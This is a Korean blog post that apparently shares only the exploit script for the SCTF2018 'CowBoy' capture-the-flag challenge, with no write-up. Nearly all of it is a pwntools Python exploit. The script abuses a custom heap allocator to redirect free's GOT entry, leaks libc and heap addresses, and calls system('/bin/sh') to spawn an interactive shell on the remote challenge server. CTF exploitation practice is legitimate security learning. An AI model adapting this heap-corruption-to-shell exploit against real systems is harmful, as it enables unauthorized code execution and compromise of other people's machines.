y0u_bat

[SCTF2018] CowBoy (only exploit code) 본문

System

[SCTF2018] CowBoy (only exploit code)

유뱃 2018. 7. 31. 02:36

 라이트업으로 쓸려구 했는데, 기억이 가물해서 그냥 코드만 올립니당


CowBoy_libc_56d992a0342a67a887b8dcaae381d2cc51205253

CowBoy_fb009bfafd91a8c5211c959cc3a5fc7a4ae8ad5d


from pwn import *
import json
context.log_level = 'DEBUG'
#s = process("./cowboy",env={"LD_PRELOAD":'./libc.so.6'})

#gdb.attach(s)
#a = remote("127.0.0.1",1234)
s = remote("cowboy.eatpwnnosleep.com",14697)
a = {
    'apikey' : 'key',
}

s.send(json.dumps(a).encode())
print s.recv(4096)
def alloc(size):
	sleep(0.2)
	s.sendline("1")
	sleep(0.2)
	s.recvuntil("2049:")
	s.sendline(str(size))
	sleep(0.2)
	s.recvuntil("= 0x")
	custem_heap = int(s.recv(11),16)
	return custem_heap

def fill_data(bum,cum,data):
	sleep(0.2)
	s.sendline("4")
	sleep(0.2)
	s.recvuntil(":")
	s.sendline(str(bum))
	sleep(0.2)
	s.recvuntil(":")
	s.sendline(str(cum))
	sleep(0.2)
	s.send(data)
	s.recv(2048)

def show_da(flag):
	s.sendline("3")
	sleep(0.2)
	if flag ==1:
		s.recvuntil("0x7")
		leak = int("7" +s.recv(11),16)
	elif flag == 0:
		s.recvuntil("0x")
		s.recvuntil("0x")
		s.recvuntil("0x")
		s.recvuntil("0x")
		s.recvuntil("0x")
		leak = int(s.recv(7),16)
	s.recv(2048)
	return leak

def free_da(bum,cum):
	s.sendline("2")
	sleep(0.2)
	s.recvuntil(":")
	s.sendline(str(bum))
	sleep(0.2)
	s.recvuntil(":")
	s.sendline(str(cum))
	s.recv(2048)

free_got = 0x602018
s.recvuntil("----------------------------------------")
s.recvuntil("----------------------------------------")
s.recvuntil("\n")


heap = alloc(100)

fill_data(3,0,p64(0x602090)*2+p64(free_got-8)*5)
alloc(100)
libc_base = show_da(1)-0x3AF60
fill_data(3,1,p64(0x6020f8)*10)
alloc(100)
heap_leak = show_da(0)
system_libc = libc_base+0x45390
alloc(0)
fill_data(0,0,p64(heap+0x10)*2)
alloc(50)
free_da(2,0)
fill_data(2,0,"/bin/sh\x00"+p64(system_libc)*2);

log.info("custem_heap : " + hex(heap))
log.info("libc_leak : " + hex(libc_base))
log.info("heap_leak : " + hex(heap_leak))

s.interactive()

 

저작자표시

'System' 카테고리의 다른 글

Whitehat 2018 Final PAC - 500pt  (0) 2018.07.31
A case study of JavaScriptCore and CVE-2016-4622  (0) 2017.06.12
[how2heap] House of Spirit  (0) 2017.01.25
Double Free Bug Vulnerability  (0) 2017.01.09
[heap] fastbin_dup_into_stack.c  (0) 2016.11.02
공유하기 링크
'System' Related Articles more
Comments